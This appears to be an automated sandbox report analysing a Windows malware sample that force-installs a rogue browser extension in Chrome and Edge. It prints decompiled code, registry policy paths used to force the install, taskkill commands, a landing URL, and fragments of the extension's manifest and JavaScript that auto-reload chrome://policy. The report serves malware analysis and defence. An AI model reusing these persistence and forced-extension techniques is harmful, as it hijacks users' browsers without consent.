Start time:	19:07:02
Start date:	12/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5244, Parent PID: 1264

General

Target ID:	4
Start time:	19:07:03
Start date:	12/06/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1612,i,1794324843492306011,10960809386793775335,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7216, Parent PID: 5884

General

Target ID:	5
Start time:	19:07:04
Start date:	12/06/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7832, Parent PID: 7216

General

Target ID:	6
Start time:	19:07:05
Start date:	12/06/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1728,i,13370300744351051505,8597988726894195581,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 7800, Parent PID: 5884

General

Target ID:	7
Start time:	19:07:15
Start date:	12/06/2023
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	/F /IM chrome.exe /T
Imagebase:	0xc20000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7648, Parent PID: 7800

General

Target ID:	8
Start time:	19:07:16
Start date:	12/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: edgchrv5.exePID: 5884, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	22.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	23

Executed Functions

Function 01001740 Relevance: 173.9, APIs: 34, Strings: 65, Instructions: 685
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,C:\Program Files,00000026,00000000), ref: 01001767

Strings

SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01002346
SOFTWARE\WOW6432Node\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001D6B
https://getfiles.wiki/welcome.php, xrefs: 01002415
SOFTWARE\Policies\Google\Chrome, xrefs: 010018E5
version, xrefs: 0100274C
ecffbknobglofafinobbcmaionnihcma, xrefs: 010028CE
%s\Google\Chrome\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001AAD
SOFTWARE\WOW6432Node\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001D4C
/F /IM msedge.exe /T, xrefs: 0100291D
/IM chrome.exe, xrefs: 01001D86
Profile , xrefs: 01001B80
SOFTWARE\Google\Chrome\Extensions, xrefs: 010019DA
SOFTWARE\WOW6432Node\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01002751
SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist, xrefs: 01002266
ecffbknobglofafinobbcmaionnihcma, xrefs: 01001CE3
SOFTWARE\Policies\Microsoft\Edge, xrefs: 010022C8
version, xrefs: 0100270E
SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 01001F0A
%s\edge.crx, xrefs: 010026B2
1.0, xrefs: 01001D22
SOFTWARE\WOW6432Node\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01002733
SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001D0D
open, xrefs: 01001A3C
%s\ServiceApp\apps-helper, xrefs: 01001CAA
/IM msedge.exe, xrefs: 0100276C
open, xrefs: 01002421
Profile , xrefs: 0100255E
SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01002713
C:\Program Files, xrefs: 01001760, 01001772, 010017D5
%s\Microsoft\Edge\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma\1.0_0\src\jquery-3.5.1.min.js, xrefs: 0100285D
SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist, xrefs: 010028D8
SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist, xrefs: 010026D5
ecffbknobglofafinobbcmaionnihcma, xrefs: 010028E7
%s\Google\Chrome\User Data\*.*, xrefs: 01001A65
version, xrefs: 01001D66
ecffbknobglofafinobbcmaionnihcma, xrefs: 010026CB
1.0, xrefs: 01002709
path, xrefs: 01001D08
SOFTWARE\Microsoft\Edge\Extensions, xrefs: 010023B9
%s\Microsoft\Edge\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 0100248E
SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 010026F5
%s\Microsoft\Edge\User Data\*.*, xrefs: 01002444
SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001D2C
SOFTWARE\WOW6432Node\Policies\Microsoft\Edge\ExtensionInstallForcelist, xrefs: 010028F1
path, xrefs: 0100272E
%s\Google\Chrome\Application\chrome.exe, xrefs: 010017DA
path, xrefs: 01001D47
%s\Google\Chrome\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma\1.0_0\src\jquery-3.5.1.min.js, xrefs: 01001E7B
path, xrefs: 010026F0
SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 0100195C
SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 0100188A
%s\Microsoft\EdgeCore\%s\msedge.exe, xrefs: 010021BB
%s\ServiceApp\apps-helper, xrefs: 01002697
1.0, xrefs: 01002747
SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 01001EEC
%s\edge.crx, xrefs: 01001CCA
ecffbknobglofafinobbcmaionnihcma, xrefs: 01001F00
version, xrefs: 01001D27
SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist, xrefs: 01002200
ecffbknobglofafinobbcmaionnihcma, xrefs: 01001EE2
SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist, xrefs: 01001824
1.0, xrefs: 01001D61
/F /IM chrome.exe /T, xrefs: 01001F2B
SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist, xrefs: 01001CED
https://getfiles.wiki/welcome.php, xrefs: 01001A30

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: FolderPathSpecial
String ID: /F /IM chrome.exe /T$ /F /IM msedge.exe /T$ /IM chrome.exe$ /IM msedge.exe$ https://getfiles.wiki/welcome.php$ https://getfiles.wiki/welcome.php$%s\Google\Chrome\Application\chrome.exe$%s\Google\Chrome\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma\1.0_0\src\jquery-3.5.1.min.js$%s\Google\Chrome\User Data\*.*$%s\Google\Chrome\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma$%s\Microsoft\EdgeCore\%s\msedge.exe$%s\Microsoft\Edge\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma\1.0_0\src\jquery-3.5.1.min.js$%s\Microsoft\Edge\User Data\*.*$%s\Microsoft\Edge\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma$%s\ServiceApp\apps-helper$%s\ServiceApp\apps-helper$%s\edge.crx$%s\edge.crx$1.0$1.0$1.0$1.0$C:\Program Files$Profile $Profile $SOFTWARE\Google\Chrome\Extensions$SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Microsoft\Edge\Extensions$SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Policies\Google\Chrome$SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist$SOFTWARE\Policies\Microsoft\Edge$SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist$SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist$SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist$SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist$SOFTWARE\WOW6432Node\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\WOW6432Node\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\WOW6432Node\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\WOW6432Node\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist$SOFTWARE\WOW6432Node\Policies\Microsoft\Edge\ExtensionInstallForcelist$ecffbknobglofafinobbcmaionnihcma$ecffbknobglofafinobbcmaionnihcma$ecffbknobglofafinobbcmaionnihcma$ecffbknobglofafinobbcmaionnihcma$ecffbknobglofafinobbcmaionnihcma$ecffbknobglofafinobbcmaionnihcma$open$open$path$path$path$path$version$version$version$version
API String ID: 994120019-4021127192
Opcode ID: 2f18b80f036f0825acbaf0a81bc9067adf750faeda611f618f92d9ef0e2b386a
Instruction ID: 14db3c529547940e281c093c2b9cf139f5f537c5cb320d3a857479aed5909c80
Opcode Fuzzy Hash: 2f18b80f036f0825acbaf0a81bc9067adf750faeda611f618f92d9ef0e2b386a
Instruction Fuzzy Hash: E44290B0A40219AAFB77EB58CC49BF9B7B8AB14710F0046D8F6C9A61C5D7749B84CF11

Uniqueness

Uniqueness Score: -1.00%

Function 01001F50 Relevance: 82.8, APIs: 28, Strings: 19, Instructions: 506
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000), ref: 01001F79
_memset.LIBCMT ref: 01001FB6

Strings

%s\Microsoft\EdgeCore\%s\msedge.exe, xrefs: 010021BB
SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01002346
https://getfiles.wiki/welcome.php, xrefs: 01002416, 01002415
ecffbknobglofafinobbcmaionnihcma, xrefs: 010023E2
SOFTWARE\Microsoft\Edge\Extensions, xrefs: 010023B9
%s\Microsoft\Edge\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 0100248F, 0100248E
%s\Microsoft\Edge\User Data\*.*, xrefs: 01002444
path, xrefs: 0100236B
Default, xrefs: 010024C2
open, xrefs: 01002421
Profile , xrefs: 0100255E
version, xrefs: 01002382
ExtensionInstallAllowlist, xrefs: 010022F1
SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist, xrefs: 01002266
ExtensionInstallForcelist, xrefs: 01002309
SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist, xrefs: 01002200
%s\Microsoft\Edge\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 0100258D
%s\Microsoft\EdgeCore\*.*, xrefs: 01001F86
SOFTWARE\Policies\Microsoft\Edge, xrefs: 010022C8

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: FolderPathSpecial_memset
String ID: https://getfiles.wiki/welcome.php$%s\Microsoft\EdgeCore\%s\msedge.exe$%s\Microsoft\EdgeCore\*.*$%s\Microsoft\Edge\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma$%s\Microsoft\Edge\User Data\*.*$%s\Microsoft\Edge\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma$Default$ExtensionInstallAllowlist$ExtensionInstallForcelist$Profile $SOFTWARE\Microsoft\Edge\Extensions$SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Policies\Microsoft\Edge$SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist$SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist$ecffbknobglofafinobbcmaionnihcma$open$path$version
API String ID: 3848166852-3189779525
Opcode ID: a1dd364846733d635bf473e184c56503941a7ebefd73dfb27fc06120fceaef00
Instruction ID: 62f5cd39c0f19413672a3f90c96122f933565eaf5c3c134c35cd9a43b5c1e01a
Opcode Fuzzy Hash: a1dd364846733d635bf473e184c56503941a7ebefd73dfb27fc06120fceaef00
Instruction Fuzzy Hash: 2322C374D002199BEB77DB68CC4CAF9B7B8AB24320F0446D9E6A9A21D5D7748BC1CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0100180C Relevance: 70.4, APIs: 23, Strings: 17, Instructions: 350
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist,00000000,000F003F,?), ref: 0100182E
RegDeleteValueW.ADVAPI32(?,0100F484), ref: 0100185A

Strings

SOFTWARE\Policies\Google\Chrome, xrefs: 010018E5
%s\Google\Chrome\User Data\*.*, xrefs: 01001A65
%s\Google\Chrome\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001BAF
%s\Google\Chrome\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001AAD
ExtensionInstallAllowlist, xrefs: 0100190E
version, xrefs: 0100199D
ecffbknobglofafinobbcmaionnihcma, xrefs: 010019FE
Profile , xrefs: 01001B80
open, xrefs: 01001A3C
SOFTWARE\Google\Chrome\Extensions, xrefs: 010019DA
path, xrefs: 01001986
SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist, xrefs: 01001824
Default, xrefs: 01001ADD
SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 0100195C
ExtensionInstallForcelist, xrefs: 01001925
https://getfiles.wiki/welcome.php, xrefs: 01001A30
SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 0100188A

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: DeleteOpenValue
String ID: https://getfiles.wiki/welcome.php$%s\Google\Chrome\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma$%s\Google\Chrome\User Data\*.*$%s\Google\Chrome\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma$Default$ExtensionInstallAllowlist$ExtensionInstallForcelist$Profile $SOFTWARE\Google\Chrome\Extensions$SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Policies\Google\Chrome$SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist$ecffbknobglofafinobbcmaionnihcma$open$path$version
API String ID: 2654517830-605086317
Opcode ID: 56831fbf5a55252b2d00f73e3a7422fff3bb2fd55189ca3160938cdc0ae3bf59
Instruction ID: 5b0389ea9b26744d41d1fed9f02437910aa60ef9b1a261500a6972e9c1aa40be
Opcode Fuzzy Hash: 56831fbf5a55252b2d00f73e3a7422fff3bb2fd55189ca3160938cdc0ae3bf59
Instruction Fuzzy Hash: 82E1D4B09042199BEB73DBA8DC49AE8B7B4FB55321F0046C9E5A9A61D1DB74CB80CF11

Uniqueness

Uniqueness Score: -1.00%

Function 01001460 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 29%

			E01001460(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				short _v532;
				void* _v536;
				void* _v540;
				void* _v544;
				void* _v548;
				signed int _t42;
				signed int _t43;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t52;
				void* _t55;
				void* _t78;
				intOrPtr _t92;
				void* _t97;
				void* _t98;
				signed int _t99;
				signed int _t107;
				void* _t108;
				void* _t109;

				_t98 = __esi;
				_t97 = __edi;
				_t78 = __ebx;
				_t42 =  *0x100e004; // 0xa4df7d0e
				_t43 = _t42 ^ _t99;
				_t107 = _t43;
				_v8 = _t43;
				if(_t107 != 0 && _t107 == 0) {
				}
				_t44 =  *0x101d264; // 0x145f9e0
				E01002B10( &_v532,  &_v532, L"%s\\ServiceApp", _t44);
				CreateDirectoryW( &_v532, 0); // executed
				asm("clc");
				if(_t107 < 0) {
					0xd364b691();
				}
				_t47 =  *0x101d264; // 0x145f9e0
				E01002B10( &_v532,  &_v532, L"%s\\ServiceApp\\apps-helper", _t47);
				if(_t107 != 0 && _t107 == 0) {
					0xf095();
				}
				 *((intOrPtr*)( &_v532 - 1))(0);
				asm("adc eax, 0x101d284"); // executed
				if(_t107 != 0 && _t107 == 0) {
					0x2d2797f();
				}
				_t50 =  *0x101d264; // 0x145f9e0
				_t81 =  &_v532;
				E01002B10( &_v532,  &_v532, L"%s\\ServiceApp\\apps-helper\\manifest.json", _t50);
				if(_t107 != 0 && _t107 == 0) {
					0x80();
				}
				_t52 = CreateFileW( &_v532, 0x40000000, 1, 0, 2, 0x80, 0); // executed
				_v536 = _t52;
				if(_t107 != 0 && _t107 == 0) {
					0xfeecd2ab();
				}
				_t108 = _v536 - 0xffffffff;
				if(_t108 != 0) {
					if(_t108 != 0 && _t108 == 0) {
						0x6800();
					}
					WriteFile(_v536, E01001000(_t81, "{\r\n\t\"name\": \"Apps\",\r\n\t\"description\": \"\",\r\n\t\"version\": \"1.0\",\r\n\t\"manifest_version\": 3,\r\n\t\"background\": {\r\n\t\t\"service_worker\": \"service.js\",\r\n\t\t\"type\": \"module\"\r\n\t},\r\n\t\"permissions\": [\"tabs\", \"scripting\", \"management\", \"background\"],\r\n\t\"host_permissions\": [\"chrome://*/*\"]\r\n}", 0x111), 0x111, 0, 0); // executed
					if(_t108 > 0 && _t108 <= 0) {
						0xfeeca2ed();
					}
					_t81 = _v536;
					 *((intOrPtr*)(_t81 - 1))();
					asm("adc eax, 0x100c00c");
					if(_t108 > 0 && _t108 <= 0) {
						0x27f18f2();
					}
				}
				if(_t108 > 0 && _t108 <= 0) {
					0xd3642b04();
				}
				_t92 =  *0x101d264; // 0x145f9e0
				E01002B10(_t81,  &_v532, L"%s\\ServiceApp\\apps-helper\\service.js", _t92);
				asm("clc");
				if(_t108 < 0) {
					0x69008080();
				}
				_t55 = CreateFileW( &_v532, 0x40000000, 1, 0, 2, 0x80, 0); // executed
				_v540 = _t55;
				if(_t108 != 0 && _t108 == 0) {
				}
				_t109 = _v540 - 0xffffffff;
				_push( *((intOrPtr*)(_t99 + _t97 + 0x7e)));
			}

0x01001460
0x01001460
0x01001460
0x01001469
0x0100146e
0x0100146e
0x01001470
0x01001473
0x01001473
0x01001478
0x0100148a
0x0100149b
0x010014a1
0x010014a2
0x010014a4
0x010014a4
0x010014a6
0x010014b8
0x010014c0
0x010014c4
0x010014c4
0x010014cd
0x010014d0
0x010014d5
0x010014d9
0x010014d9
0x010014da
0x010014e5
0x010014ec
0x010014f4
0x010014f8
0x010014f8
0x01001513
0x01001519
0x0100151f
0x01001523
0x01001523
0x01001524
0x0100152b
0x0100152d
0x01001531
0x01001531
0x01001553
0x01001559
0x0100155d
0x0100155d
0x0100155e
0x01001563
0x01001566
0x0100156b
0x0100156f
0x0100156f
0x0100156b
0x01001570
0x01001574
0x01001574
0x01001575
0x01001588
0x01001590
0x01001591
0x01001593
0x01001593
0x010015ae
0x010015b4
0x010015ba
0x010015ba
0x010015bf
0x010015c5

APIs

CreateDirectoryW.KERNELBASE(?,00000000), ref: 0100149B

Strings

%s\ServiceApp, xrefs: 0100147E
%s\ServiceApp\apps-helper\service.js, xrefs: 0100157C
{"name": "Apps","description": "","version": "1.0","manifest_version": 3,"background": {"service_worker": "service.js","type": "module"},"permissions": ["tabs", "scripting", "management", "background"],"host_permissions": ["chro, xrefs: 01001541
%s\ServiceApp\apps-helper, xrefs: 010014AC
%s\ServiceApp\apps-helper\manifest.json, xrefs: 010014E1, 010014E0
chrome.management.onInstalled.addListener(info => {if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id, xrefs: 010015DB

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CreateDirectory
String ID: %s\ServiceApp$%s\ServiceApp\apps-helper$%s\ServiceApp\apps-helper\manifest.json$%s\ServiceApp\apps-helper\service.js$chrome.management.onInstalled.addListener(info => {if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id${"name": "Apps","description": "","version": "1.0","manifest_version": 3,"background": {"service_worker": "service.js","type": "module"},"permissions": ["tabs", "scripting", "management", "background"],"host_permissions": ["chro
API String ID: 4241100979-2197705422
Opcode ID: 1f53de3c2d16805fd1ab0b289711663fcc9181091f6ae3cc883271afb85d977c
Instruction ID: f9f5fff4bbca6b0d6e00f52eeb778684ff409391945130c26b8051a15cf61812
Opcode Fuzzy Hash: 1f53de3c2d16805fd1ab0b289711663fcc9181091f6ae3cc883271afb85d977c
Instruction Fuzzy Hash: 9F41FB70944305ABF7B3E76C9C49BE937B4AB24721F080784F6F55A0D1DAB6C581CB61

Uniqueness

Uniqueness Score: -1.00%

Function 010015BC Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 128
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E010015BC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t44;
				void* _t45;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t65;

				_t57 = __esi;
				_t56 = __edi;
				_t45 = __ecx;
				_t44 = __ebx;
				if(__eflags == 0) {
				}
				_t65 =  *((intOrPtr*)(_t58 - 0x218)) - 0xffffffff;
				_push( *((intOrPtr*)(_t58 + _t56 + 0x7e)));
			}

0x010015bc
0x010015bc
0x010015bc
0x010015bc
0x010015bc
0x010015bc
0x010015bf
0x010015c5

APIs

WriteFile.KERNELBASE(000000FF,00000000,00000140,00000000,00000000), ref: 010015ED

Strings

%s\ServiceApp\apps-helper\edge.crx, xrefs: 010016A5
%s\ServiceApp\apps-helper\web.js, xrefs: 01001611
addEventListener('load', () => {if (location.host !== 'policy') return;const reload = () => {const button = document.querySelector('#reload-policies');if (button) {button.click();setTimeout(close, 200);} else {setTimeout(re, xrefs: 01001670
chrome.management.onInstalled.addListener(info => {if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id, xrefs: 010015DB

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: FileWrite
String ID: %s\ServiceApp\apps-helper\edge.crx$%s\ServiceApp\apps-helper\web.js$addEventListener('load', () => {if (location.host !== 'policy') return;const reload = () => {const button = document.querySelector('#reload-policies');if (button) {button.click();setTimeout(close, 200);} else {setTimeout(re$chrome.management.onInstalled.addListener(info => {if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id
API String ID: 3934441357-3213518862
Opcode ID: af68339d9a4384d69162dd3e6465b0414f102784399206551db06509b546b75f
Instruction ID: 6f270ae8de8de5ae43653a32d472acc9a3a4e4b29c3b42c082445d69b0c786c7
Opcode Fuzzy Hash: af68339d9a4384d69162dd3e6465b0414f102784399206551db06509b546b75f
Instruction Fuzzy Hash: 8741BA70640304A7F7B39BAC9C49FE937A46728731F1807C8F2F5A60D1DAB5D5818B55

Uniqueness

Uniqueness Score: -1.00%

Function 01001330 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 101
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0100135D
CreateProcessW.KERNELBASE(c:\windows\system32\taskkill.exe,?,00000000,00000000,00000000,08000020,00000000,00000000,00000044,00000000), ref: 01001391

Strings

D, xrefs: 0100136A
c:\windows\system32\taskkill.exe, xrefs: 0100138C

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

